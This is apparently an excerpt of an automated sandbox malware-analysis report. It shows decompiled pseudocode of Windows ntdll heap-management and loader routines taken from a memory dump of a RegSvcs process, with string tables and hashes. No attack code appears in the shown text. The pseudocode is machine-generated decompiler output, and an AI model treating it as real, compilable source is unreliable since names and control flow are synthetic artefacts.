                                          								E012FB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t419);
                                          								_t271 =  *[fs:0x30];
                                          								_t421 = _t421 + 0xc;
                                          								__eflags =  *((char*)(_t271 + 2));
                                          								if( *((char*)(_t271 + 2)) != 0) {
                                          									 *0x13e6378 = 1;
                                          									asm("int3");
                                          									 *0x13e6378 = 0;
                                          								}
                                          							}
                                          						}
                                          						_t381 = _a4;
                                          						_t414 = _t419;
                                          						_t419[1] = 0;
                                          						_t419[3] = 0;
                                          						 *_t381 =  *_t381 + ( *_t419 & 0x0000ffff);
                                          						 *_t419 =  *_t381;
                                          						 *(_t419 + 4 +  *_t381 * 8) =  *_t381 ^  *(_t307 + 0x54);
                                          						L4:
                                          						_t420 = _t414 +  *_t381 * 8;
                                          						if( *(_t307 + 0x4c) == 0) {
                                          							L6:
                                          							while((( *(_t307 + 0x4c) >> 0x00000014 &  *(_t307 + 0x52) ^ _t420[0]) & 0x00000001) == 0) {
                                          								__eflags =  *(_t307 + 0x4c);
                                          								if( *(_t307 + 0x4c) != 0) {
                                          									_t390 =  *(_t307 + 0x50) ^  *_t420;
                                          									 *_t420 = _t390;
                                          									_t328 = _t390 >> 0x00000010 ^ _t390 >> 0x00000008 ^ _t390;
                                          									__eflags = _t390 >> 0x18 - _t328;
                                          									if(__eflags != 0) {
                                          										_push(_t328);
                                          										E013AFA2B(_t307, _t307, _t420, _t414, _t420, __eflags);
                                          									}
                                          								}
                                          								__eflags = _v5;
                                          								if(_v5 == 0) {
                                          									L94:
                                          									_t382 = _t420[3];
                                          									_t137 =  &(_t420[2]); // -16
                                          									_t309 = _t137;
                                          									_t186 =  *_t309;
                                          									_v20 = _t186;
                                          									_v16 = _t382;
                                          									_t187 =  *((intOrPtr*)(_t186 + 4));
                                          									__eflags =  *_t382 - _t187;
                                          									if( *_t382 != _t187) {
                                          										L63:
                                          										_push(_t309);
                                          										_push( *_t382);
                                          										_push(_t187);
                                          										_push(_t309);
                                          										_push(0xd);
                                          										L64:
                                          										E013BA80D(_t307);
                                          										continue;
                                          									}
                                          									__eflags =  *_t382 - _t309;
                                          									if( *_t382 != _t309) {
                                          										goto L63;
                                          									}
                                          									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t420 & 0x0000ffff);
                                          									_t393 =  *(_t307 + 0xb4);
                                          									__eflags = _t393;
                                          									if(_t393 == 0) {
                                          										L104:
                                          										_t330 = _v16;
                                          										_t190 = _v20;
                                          										 *_t330 = _t190;
                                          										 *(_t190 + 4) = _t330;
                                          										__eflags = _t420[0] & 0x00000008;
                                          										if((_t420[0] & 0x00000008) == 0) {
                                          											L107:
                                          											_t331 = _t420[0];
                                          											__eflags = _t331 & 0x00000004;
                                          											if((_t331 & 0x00000004) != 0) {
                                          												_t196 = ( *_t420 & 0x0000ffff) * 8 - 0x10;
                                          												_v12 = _t196;
                                          												__eflags = _t331 & 0x00000002;
                                          												if((_t331 & 0x00000002) != 0) {
                                          													__eflags = _t196 - 4;
                                          													if(_t196 > 4) {
                                          														_t196 = _t196 - 4;
                                          														__eflags = _t196;
                                          														_v12 = _t196;
                                          													}
                                          												}
                                          												_t162 =  &(_t420[4]); // -8
                                          												_t197 = E0134D540(_t162, _t196, 0xfeeefeee);
                                          												_v20 = _t197;
                                          												__eflags = _t197 - _v12;
                                          												if(_t197 != _v12) {
                                          													_t335 =  *[fs:0x30];
                                          													__eflags =  *(_t335 + 0xc);
                                          													if( *(_t335 + 0xc) == 0) {
                                          														_push("HEAP: ");
                                          														E012FB150();
                                          													} else {
                                          														E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          													}
                                          													_push(_v20 + 0x10 + _t420);
                                          													E012FB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t420);
                                          													_t203 =  *[fs:0x30];
                                          													__eflags =  *((char*)(_t203 + 2));
                                          													if( *((char*)(_t203 + 2)) != 0) {
                                          														 *0x13e6378 = 1;
                                          														asm("int3");
                                          														 *0x13e6378 = 0;
                                          													}
                                          												}
                                          											}
                                          											_t394 = _a4;
                                          											_t414[1] = 0;
                                          											_t414[3] = 0;
                                          											 *_t394 =  *_t394 + ( *_t420 & 0x0000ffff);
                                          											 *_t414 =  *_t394;
                                          											 *(_t414 + 4 +  *_t394 * 8) =  *_t394 ^  *(_t307 + 0x54);
                                          											break;
                                          										}
                                          										_t207 = E0131A229(_t307, _t420);
                                          										__eflags = _t207;
                                          										if(_t207 != 0) {
                                          											goto L107;
                                          										}
                                          										E0131A309(_t307, _t420,  *_t420 & 0x0000ffff, 1);
                                          										continue;
                                          									}
                                          									_t342 =  *_t420 & 0x0000ffff;
                                          									while(1) {
                                          										__eflags = _t342 -  *((intOrPtr*)(_t393 + 4));
                                          										if(_t342 <  *((intOrPtr*)(_t393 + 4))) {
                                          											break;
                                          										}
                                          										_t210 =  *_t393;
                                          										__eflags = _t210;
                                          										if(_t210 == 0) {
                                          											_t212 =  *((intOrPtr*)(_t393 + 4)) - 1;
                                          											__eflags =  *((intOrPtr*)(_t393 + 4)) - 1;
                                          											L103:
                                          											_t146 =  &(_t420[2]); // -16
                                          											E0131BC04(_t307, _t393, 1, _t146, _t212, _t342);
                                          											goto L104;
                                          										}
                                          										_t393 = _t210;
                                          									}
                                          									_t212 = _t342;
                                          									goto L103;
                                          								} else {
                                          									_t384 = _t414[6];
                                          									_t102 =  &(_t414[4]); // -16
                                          									_t311 = _t102;
                                          									_t215 =  *_t311;
                                          									_v20 = _t215;
                                          									_v16 = _t384;
                                          									_t216 =  *((intOrPtr*)(_t215 + 4));
                                          									__eflags =  *_t384 - _t216;
                                          									if( *_t384 != _t216) {
                                          										L92:
                                          										_push(_t311);
                                          										_push( *_t384);
                                          										E013BA80D(_t307, 0xd, _t311, _t216);
                                          										L93:
                                          										_v5 = 0;
                                          										goto L94;
                                          									}
                                          									__eflags =  *_t384 - _t311;
                                          									if( *_t384 != _t311) {
                                          										goto L92;
                                          									}
                                          									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
                                          									_t386 =  *(_t307 + 0xb4);
                                          									__eflags = _t386;
                                          									if(_t386 == 0) {
                                          										L79:
                                          										_t313 = _v16;
                                          										_t219 = _v20;
                                          										 *_t313 = _t219;
                                          										 *(_t219 + 4) = _t313;
                                          										__eflags = _t414[1] & 0x00000008;
                                          										if((_t414[1] & 0x00000008) == 0) {
                                          											L82:
                                          											_t314 = _t414[1];
                                          											__eflags = _t314 & 0x00000004;
                                          											if((_t314 & 0x00000004) != 0) {
                                          												_t221 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
                                          												_v12 = _t221;
                                          												__eflags = _t314 & 0x00000002;
                                          												if((_t314 & 0x00000002) != 0) {
                                          													__eflags = _t221 - 4;
                                          													if(_t221 > 4) {
                                          														_t221 = _t221 - 4;
                                          														__eflags = _t221;
                                          														_v12 = _t221;
                                          													}
                                          												}
                                          												_t127 =  &(_t414[8]); // -8
                                          												_t222 = E0134D540(_t127, _t221, 0xfeeefeee);
                                          												_v20 = _t222;
                                          												__eflags = _t222 - _v12;
                                          												if(_t222 != _v12) {
                                          													_t316 =  *[fs:0x30];
                                          													__eflags =  *(_t316 + 0xc);
                                          													if( *(_t316 + 0xc) == 0) {
                                          														_push("HEAP: ");
                                          														E012FB150();
                                          													} else {
                                          														E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          													}
                                          													_push(_v20 + 0x10 + _t414);
                                          													E012FB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
                                          													_t228 =  *[fs:0x30];
                                          													_t421 = _t421 + 0xc;
                                          													__eflags =  *((char*)(_t228 + 2));
                                          													if( *((char*)(_t228 + 2)) != 0) {
                                          														 *0x13e6378 = 1;
                                          														asm("int3");
                                          														 *0x13e6378 = 0;
                                          													}
                                          												}
                                          											}
                                          											goto L93;
                                          										}
                                          										_t232 = E0131A229(_t307, _t414);
                                          										__eflags = _t232;
                                          										if(_t232 != 0) {
                                          											goto L82;
                                          										}
                                          										E0131A309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
                                          										goto L93;
                                          									}
                                          									_t323 =  *_t414 & 0x0000ffff;
                                          									while(1) {
                                          										__eflags = _t323 -  *((intOrPtr*)(_t386 + 4));
                                          										if(_t323 <  *((intOrPtr*)(_t386 + 4))) {
                                          											break;
                                          										}
                                          										_t235 =  *_t386;
                                          										__eflags = _t235;
                                          										if(_t235 == 0) {
                                          											_t237 =  *((intOrPtr*)(_t386 + 4)) - 1;
                                          											__eflags =  *((intOrPtr*)(_t386 + 4)) - 1;
                                          											L78:
                                          											_t111 =  &(_t414[4]); // -16
                                          											E0131BC04(_t307, _t386, 1, _t111, _t237, _t323);
                                          											goto L79;
                                          										}
                                          										_t386 = _t235;
                                          									}
                                          									_t237 = _t323;
                                          									goto L78;
                                          								}
                                          							}
                                          							return _t414;
                                          						}
                                          						_t398 =  *(_t307 + 0x50) ^  *_t420;
                                          						_t347 = _t398 >> 0x00000010 ^ _t398 >> 0x00000008 ^ _t398;
                                          						if(_t398 >> 0x18 != _t347) {
                                          							_push(_t347);
                                          							_push(0);
                                          							_push(0);
                                          							_push(_t420);
                                          							_push(3);
                                          							goto L64;
                                          						}
                                          						goto L6;
                                          					} else {
                                          						_t277 =  *_t419 & 0x0000ffff;
                                          						_v16 = _t277;
                                          						while(1) {
                                          							__eflags = _t277 -  *((intOrPtr*)(_t404 + 4));
                                          							if(_t277 <  *((intOrPtr*)(_t404 + 4))) {
                                          								break;
                                          							}
                                          							_t279 =  *_t404;
                                          							__eflags = _t279;
                                          							if(_t279 == 0) {
                                          								_t277 =  *((intOrPtr*)(_t404 + 4)) - 1;
                                          								__eflags =  *((intOrPtr*)(_t404 + 4)) - 1;
                                          								break;
                                          							} else {
                                          								_t404 = _t279;
                                          								_t277 =  *_t419 & 0x0000ffff;
                                          								continue;
                                          							}
                                          						}
                                          						E0131BC04(_t307, _t404, 1, _t350, _t277, _v16);
                                          						goto L20;
                                          					}
                                          				}
                                          			}
                                          0x013616ff
                                          0x01361701
                                          0x0136172c
                                          0x0136172c
                                          0x0136172f
                                          0x01361732
                                          0x01361734
                                          0x01361737
                                          0x0136173b
                                          0x0136175e
                                          0x0136175e
                                          0x01361761
                                          0x01361764
                                          0x0136176d
                                          0x01361774
                                          0x01361777
                                          0x0136177a
                                          0x0136177c
                                          0x0136177f
                                          0x01361781
                                          0x01361781
                                          0x01361784
                                          0x01361784
                                          0x0136177f
                                          0x0136178c
                                          0x01361791
                                          0x01361796
                                          0x01361799
                                          0x0136179c
                                          0x0136179e
                                          0x013617a5
                                          0x013617a9
                                          0x013617c9
                                          0x013617ce
                                          0x013617ab
                                          0x013617c1
                                          0x013617c6
                                          0x013617dc
                                          0x013617e3
                                          0x013617e8
                                          0x013617ee
                                          0x013617f1
                                          0x013617f5
                                          0x013617f7
                                          0x013617fe
                                          0x013617ff
                                          0x013617ff
                                          0x013617f5
                                          0x0136179c
                                          0x00000000
                                          0x01361764
                                          0x01361741
                                          0x01361746
                                          0x01361748
                                          0x00000000
                                          0x00000000
                                          0x01361754
                                          0x00000000
                                          0x01361754
                                          0x01361703
                                          0x01361710
                                          0x01361710
                                          0x01361713
                                          0x00000000
                                          0x00000000
                                          0x01361708
                                          0x0136170a
                                          0x0136170c
                                          0x0136171c
                                          0x0136171c
                                          0x0136171d
                                          0x0136171f
                                          0x01361727
                                          0x00000000
                                          0x01361727
                                          0x0136170e
                                          0x0136170e
                                          0x01361715
                                          0x00000000
                                          0x01361715
                                          0x013616cc
                                          0x01319a45
                                          0x01319a45
                                          0x01319a0e
                                          0x01319a1c
                                          0x01319a23
                                          0x0136167e
                                          0x0136167f
                                          0x01361681
                                          0x01361683
                                          0x01361684
                                          0x00000000
                                          0x01361684
                                          0x00000000
                                          0x01319aad
                                          0x01319aad
                                          0x01319ab0
                                          0x01319ab3
                                          0x01319ab3
                                          0x01319ab6
                                          0x00000000
                                          0x00000000
                                          0x01319ab8
                                          0x01319aba
                                          0x01319abc
                                          0x01319ac8
                                          0x01319ac8
                                          0x00000000
                                          0x01319abe
                                          0x01319abe
                                          0x01319ac0
                                          0x00000000
                                          0x01319ac0
                                          0x01319abc
                                          0x01319ad2
                                          0x00000000
                                          0x01319ad2
                                          0x01319aab

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                          • API String ID: 0-3178619729
                                          • Opcode ID: 6ff002cb90e4c22e4c5717a6e7fa621493280a3febe6271a9c287e7e2f387e8f
                                          • Instruction ID: fdc374c66d029036f78b427a3ab7db4ce551dfaaba4085030c4ba770a7457dc5
                                          • Opcode Fuzzy Hash: 6ff002cb90e4c22e4c5717a6e7fa621493280a3febe6271a9c287e7e2f387e8f
                                          • Instruction Fuzzy Hash: F52203706002469FEB29CF2DC495B7ABBF9EF84708F18C469E5458B74AD774D884CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 83%
                                          			E01308794(void* __ecx) {
                                          				signed int _v0;
                                          				char _v8;
                                          				signed int _v12;
                                          				void* _v16;
                                          				signed int _v20;
                                          				intOrPtr _v24;
                                          				signed int _v28;
                                          				signed int _v32;
                                          				signed int _v40;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* __ebp;
                                          				intOrPtr* _t77;
                                          				signed int _t80;
                                          				signed char _t81;
                                          				signed int _t87;
                                          				signed int _t91;
                                          				void* _t92;
                                          				void* _t94;
                                          				signed int _t95;
                                          				signed int _t103;
                                          				signed int _t105;
                                          				signed int _t110;
                                          				signed int _t118;
                                          				intOrPtr* _t121;
                                          				intOrPtr _t122;
                                          				signed int _t125;
                                          				signed int _t129;
                                          				signed int _t131;
                                          				signed int _t134;
                                          				signed int _t136;
                                          				signed int _t143;
                                          				signed int* _t147;
                                          				signed int _t151;
                                          				void* _t153;
                                          				signed int* _t157;
                                          				signed int _t159;
                                          				signed int _t161;
                                          				signed int _t166;
                                          				signed int _t168;
                                          
                                          				_push(__ecx);
                                          				_t153 = __ecx;
                                          				_t159 = 0;
                                          				_t121 = __ecx + 0x3c;
                                          				if( *_t121 == 0) {
                                          					L2:
                                          					_t77 =  *((intOrPtr*)(_t153 + 0x58));
                                          					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
                                          						_t122 =  *((intOrPtr*)(_t153 + 0x20));
                                          						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
                                          						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
                                          							L6:
                                          							if(E0130934A() != 0) {
                                          								_t159 = E0137A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
                                          								__eflags = _t159;
                                          								if(_t159 < 0) {
                                          									_t81 =  *0x13e5780; // 0x0
                                          									__eflags = _t81 & 0x00000003;
                                          									if((_t81 & 0x00000003) != 0) {
                                          										_push(_t159);
                                          										E01375510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
                                          										_t81 =  *0x13e5780; // 0x0
                                          									}
                                          									__eflags = _t81 & 0x00000010;
                                          									if((_t81 & 0x00000010) != 0) {
                                          										asm("int3");
                                          									}
                                          								}
                                          							}
                                          						} else {
                                          							_t159 = E0130849B(0, _t122, _t153, _t159, _t180);
                                          							if(_t159 >= 0) {
                                          								goto L6;
                                          							}
                                          						}
                                          						_t80 = _t159;
                                          						goto L8;
                                          					} else {
                                          						_t125 = 0x13;
                                          						asm("int 0x29");
                                          						_push(0);
                                          						_push(_t159);
                                          						_t161 = _t125;
                                          						_t87 =  *( *[fs:0x30] + 0x1e8);
                                          						_t143 = 0;
                                          						_v40 = _t161;
                                          						_t118 = 0;
                                          						_push(_t153);
                                          						__eflags = _t87;
                                          						if(_t87 != 0) {
                                          							_t118 = _t87 + 0x5d8;
                                          							__eflags = _t118;
                                          							if(_t118 == 0) {
                                          								L46:
                                          								_t118 = 0;
                                          							} else {
                                          								__eflags =  *(_t118 + 0x30);
                                          								if( *(_t118 + 0x30) == 0) {
                                          									goto L46;
                                          								}
                                          							}
                                          						}
                                          						_v32 = 0;
                                          						_v28 = 0;
                                          						_v16 = 0;
                                          						_v20 = 0;
                                          						_v12 = 0;
                                          						__eflags = _t118;
                                          						if(_t118 != 0) {
                                          							__eflags = _t161;
                                          							if(_t161 != 0) {
                                          								__eflags =  *(_t118 + 8);
                                          								if( *(_t118 + 8) == 0) {
                                          									L22:
                                          									_t143 = 1;
                                          									__eflags = 1;
                                          								} else {
                                          									_t19 = _t118 + 0x40; // 0x40
                                          									_t156 = _t19;
                                          									E01308999(_t19,  &_v16);
                                          									__eflags = _v0;
                                          									if(_v0 != 0) {
                                          										__eflags = _v0 - 1;
                                          										if(_v0 != 1) {
                                          											goto L22;
                                          										} else {
                                          											_t128 =  *(_t161 + 0x64);
                                          											__eflags =  *(_t161 + 0x64);
                                          											if( *(_t161 + 0x64) == 0) {
                                          												goto L22;
                                          											} else {
                                          												E01308999(_t128,  &_v12);
                                          												_t147 = _v12;
                                          												_t91 = 0;
                                          												__eflags = 0;
                                          												_t129 =  *_t147;
                                          												while(1) {
                                          													__eflags =  *((intOrPtr*)(0x13e5c60 + _t91 * 8)) - _t129;
                                          													if( *((intOrPtr*)(0x13e5c60 + _t91 * 8)) == _t129) {
                                          														break;
                                          													}
                                          													_t91 = _t91 + 1;
                                          													__eflags = _t91 - 5;
                                          													if(_t91 < 5) {
                                          														continue;
                                          													} else {
                                          														_t131 = 0;
                                          														__eflags = 0;
                                          													}
                                          													L37:
                                          													__eflags = _t131;
                                          													if(_t131 != 0) {
                                          														goto L22;
                                          													} else {
                                          														__eflags = _v16 - _t147;
                                          														if(_v16 != _t147) {
                                          															goto L22;
                                          														} else {
                                          															E01312280(_t92, 0x13e86cc);
                                          															_t94 = E013C9DFB( &_v20);
                                          															__eflags = _t94 - 1;
                                          															if(_t94 != 1) {
                                          															}
                                          															asm("movsd");
                                          															asm("movsd");
                                          															asm("movsd");
                                          															asm("movsd");
                                          															 *_t118 =  *_t118 + 1;
                                          															asm("adc dword [ebx+0x4], 0x0");
                                          															_t95 = E013261A0( &_v32);
                                          															__eflags = _t95;
                                          															if(_t95 != 0) {
                                          																__eflags = _v32 | _v28;
                                          																if((_v32 | _v28) != 0) {
                                          																	_t71 = _t118 + 0x40; // 0x3f
                                          																	_t134 = _t71;
                                          																	goto L55;
                                          																}
                                          															}
                                          															goto L30;
                                          														}
                                          													}
                                          													goto L56;
                                          												}
                                          												_t92 = 0x13e5c64 + _t91 * 8;
                                          												asm("lock xadd [eax], ecx");
                                          												_t131 = (_t129 | 0xffffffff) - 1;
                                          												goto L37;
                                          											}
                                          										}
                                          										goto L56;
                                          									} else {
                                          										_t143 = E01308A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
                                          										__eflags = _t143;
                                          										if(_t143 != 0) {
                                          											_t157 = _v12;
                                          											_t103 = 0;
                                          											__eflags = 0;
                                          											_t136 =  &(_t157[1]);
                                          											 *(_t161 + 0x64) = _t136;
                                          											_t151 =  *_t157;
                                          											_v20 = _t136;
                                          											while(1) {
                                          												__eflags =  *((intOrPtr*)(0x13e5c60 + _t103 * 8)) - _t151;
                                          												if( *((intOrPtr*)(0x13e5c60 + _t103 * 8)) == _t151) {
                                          													break;
                                          												}
                                          												_t103 = _t103 + 1;
                                          												__eflags = _t103 - 5;
                                          												if(_t103 < 5) {
                                          													continue;
                                          												}
                                          												L21:
                                          												_t105 = E0133F380(_t136, 0x12d1184, 0x10);
                                          												__eflags = _t105;
                                          												if(_t105 != 0) {
                                          													__eflags =  *_t157 -  *_v16;
                                          													if( *_t157 >=  *_v16) {
                                          														goto L22;
                                          													} else {
                                          														asm("cdq");
                                          														_t166 = _t157[5] & 0x0000ffff;
                                          														_t108 = _t157[5] & 0x0000ffff;
                                          														asm("cdq");
                                          														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
                                          														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
                                          														if(__eflags > 0) {
                                          															L29:
                                          															E01312280(_t108, 0x13e86cc);
                                          															 *_t118 =  *_t118 + 1;
                                          															_t42 = _t118 + 0x40; // 0x3f
                                          															_t156 = _t42;
                                          															asm("adc dword [ebx+0x4], 0x0");
                                          															asm("movsd");
                                          															asm("movsd");
                                          															asm("movsd");
                                          															asm("movsd");
                                          															_t110 = E013261A0( &_v32);
                                          															__eflags = _t110;
                                          															if(_t110 != 0) {
                                          																__eflags = _v32 | _v28;
                                          																if((_v32 | _v28) != 0) {
                                          																	_t134 = _v20;
                                          																	L55:
                                          																	E013C9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
                                          																}
                                          															}
                                          															L30:
                                          															 *_t118 =  *_t118 + 1;
                                          															asm("adc dword [ebx+0x4], 0x0");
                                          															E0130FFB0(_t118, _t156, 0x13e86cc);
                                          															goto L22;
                                          														} else {
                                          															if(__eflags < 0) {
                                          																goto L22;
                                          															} else {
                                          																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
                                          																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
                                          																	goto L22;
                                          																} else {
                                          																	goto L29;
                                          																}
                                          															}
                                          														}
                                          													}
                                          													goto L56;
                                          												}
                                          												goto L22;
                                          											}
                                          											asm("lock inc dword [eax]");
                                          											goto L21;
                                          										}
                                          									}
                                          								}
                                          							}
                                          						}
                                          						return _t143;
                                          					}
                                          				} else {
                                          					_push( &_v8);
                                          					_push( *((intOrPtr*)(__ecx + 0x50)));
                                          					_push(__ecx + 0x40);
                                          					_push(_t121);
                                          					_push(0xffffffff);
                                          					_t80 = E01339A00();
                                          					_t159 = _t80;
                                          					if(_t159 < 0) {
                                          						L8:
                                          						return _t80;
                                          					} else {
                                          						goto L2;
                                          					}
                                          				}
                                          				L56:
                                          			}

                                          Strings
                                          • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01359C18
                                          • minkernel\ntdll\ldrsnap.c, xrefs: 01359C28
                                          • LdrpDoPostSnapWork, xrefs: 01359C1E
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                          • API String ID: 2994545307-1948996284
                                          • Opcode ID: fa23c521459b328eff48b0af270ce75644533fb9135de130710064ab4266d543
                                          • Instruction ID: 017780902b6567f5f31d8d165dfa6ee32e97ca4d94b74b71d461618e04496fba
                                          • Opcode Fuzzy Hash: fa23c521459b328eff48b0af270ce75644533fb9135de130710064ab4266d543
                                          • Instruction Fuzzy Hash: D491F331E0021ADBEF2ADF5DD4A0AAA7BF5FF4471CB1441A9D905AB281D730EE11CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 80%
                                          			E0132AC7B(void* __ecx, signed short* __edx) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				void* __ebx;
                                          				signed char _t75;
                                          				signed int _t79;
                                          				signed int _t88;
                                          				intOrPtr _t89;
                                          				signed int _t96;
                                          				signed char* _t97;
                                          				intOrPtr _t98;
                                          				signed int _t101;
                                          				signed char* _t102;
                                          				intOrPtr _t103;
                                          				signed int _t105;
                                          				signed char* _t106;
                                          				signed int _t131;
                                          				signed int _t138;
                                          				void* _t149;
                                          				signed short* _t150;
                                          
                                          				_t150 = __edx;
                                          				_t149 = __ecx;
                                          				_t70 =  *__edx & 0x0000ffff;
                                          				__edx[1] = __edx[1] & 0x000000f8;
                                          				__edx[3] = 0;
                                          				_v8 =  *__edx & 0x0000ffff;
                                          				if(( *(__ecx + 0x40) & 0x00000040) != 0) {
                                          					_t39 =  &(_t150[8]); // 0x8
                                          					E0134D5E0(_t39, _t70 * 8 - 0x10, 0xfeeefeee);
                                          					__edx[1] = __edx[1] | 0x00000004;
                                          				}
                                          				_t75 =  *(_t149 + 0xcc) ^  *0x13e8a68;
                                          				if(_t75 != 0) {
                                          					L4:
                                          					if( *((intOrPtr*)(_t149 + 0x4c)) != 0) {
                                          						_t150[1] = _t150[0] ^ _t150[1] ^  *_t150;
                                          						_t79 =  *(_t149 + 0x50);
                                          						 *_t150 =  *_t150 ^ _t79;
                                          						return _t79;
                                          					}
                                          					return _t75;
                                          				} else {
                                          					_t9 =  &(_t150[0x80f]); // 0x1017
                                          					_t138 = _t9 & 0xfffff000;
                                          					_t10 =  &(_t150[0x14]); // 0x20
                                          					_v12 = _t138;
                                          					if(_t138 == _t10) {
                                          						_t138 = _t138 + 0x1000;
                                          						_v12 = _t138;
                                          					}
                                          					_t75 = _t150 + (( *_t150 & 0x0000ffff) + 0xfffffffe) * 0x00000008 & 0xfffff000;
                                          					if(_t75 > _t138) {
                                          						_v8 = _t75 - _t138;
                                          						_push(0x4000);
                                          						_push( &_v8);
                                          						_push( &_v12);
                                          						_push(0xffffffff);
                                          						_t131 = E013396E0();
                                          						__eflags = _t131 - 0xc0000045;
                                          						if(_t131 == 0xc0000045) {
                                          							_t88 = E013A3C60(_v12, _v8);
                                          							__eflags = _t88;
                                          							if(_t88 != 0) {
                                          								_push(0x4000);
                                          								_push( &_v8);
                                          								_push( &_v12);
                                          								_push(0xffffffff);
                                          								_t131 = E013396E0();
                                          							}
                                          						}
                                          						_t89 =  *[fs:0x30];
                                          						__eflags = _t131;
                                          						if(_t131 < 0) {
                                          							__eflags =  *(_t89 + 0xc);
                                          							if( *(_t89 + 0xc) == 0) {
                                          								_push("HEAP: ");
                                          								E012FB150();
                                          							} else {
                                          								E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          							}
                                          							_push(_v8);
                                          							_push(_v12);
                                          							_push(_t149);
                                          							_t75 = E012FB150("RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t131);
                                          							goto L4;
                                          						} else {
                                          							_t96 =  *(_t89 + 0x50);
                                          							_t132 = 0x7ffe0380;
                                          							__eflags = _t96;
                                          							if(_t96 != 0) {
                                          								__eflags =  *_t96;
                                          								if( *_t96 == 0) {
                                          									goto L10;
                                          								}
                                          								_t97 =  *( *[fs:0x30] + 0x50) + 0x226;
                                          								L11:
                                          								__eflags =  *_t97;
                                          								if( *_t97 != 0) {
                                          									_t98 =  *[fs:0x30];
                                          									__eflags =  *(_t98 + 0x240) & 0x00000001;
                                          									if(( *(_t98 + 0x240) & 0x00000001) != 0) {
                                          										E013B14FB(_t132, _t149, _v12, _v8, 7);
                                          									}
                                          								}
                                          								 *((intOrPtr*)(_t149 + 0x234)) =  *((intOrPtr*)(_t149 + 0x234)) + _v8;
                                          								 *((intOrPtr*)(_t149 + 0x210)) =  *((intOrPtr*)(_t149 + 0x210)) + 1;
                                          								 *((intOrPtr*)(_t149 + 0x230)) =  *((intOrPtr*)(_t149 + 0x230)) + 1;
                                          								 *((intOrPtr*)(_t149 + 0x220)) =  *((intOrPtr*)(_t149 + 0x220)) + 1;
                                          								_t101 =  *( *[fs:0x30] + 0x50);
                                          								__eflags = _t101;
                                          								if(_t101 != 0) {
                                          									__eflags =  *_t101;
                                          									if( *_t101 == 0) {
                                          										goto L13;
                                          									}
                                          									_t102 =  *( *[fs:0x30] + 0x50) + 0x226;
                                          									goto L14;
                                          								} else {
                                          									L13:
                                          									_t102 = _t132;
                                          									L14:
                                          									__eflags =  *_t102;
                                          									if( *_t102 != 0) {
                                          										_t103 =  *[fs:0x30];
                                          										__eflags =  *(_t103 + 0x240) & 0x00000001;
                                          										if(( *(_t103 + 0x240) & 0x00000001) != 0) {
                                          											__eflags = E01317D50();
                                          											if(__eflags != 0) {
                                          												_t132 =  *( *[fs:0x30] + 0x50) + 0x226;
                                          												__eflags =  *( *[fs:0x30] + 0x50) + 0x226;
                                          											}
                                          											E013B1411(_t132, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t132 & 0x000000ff);
                                          										}
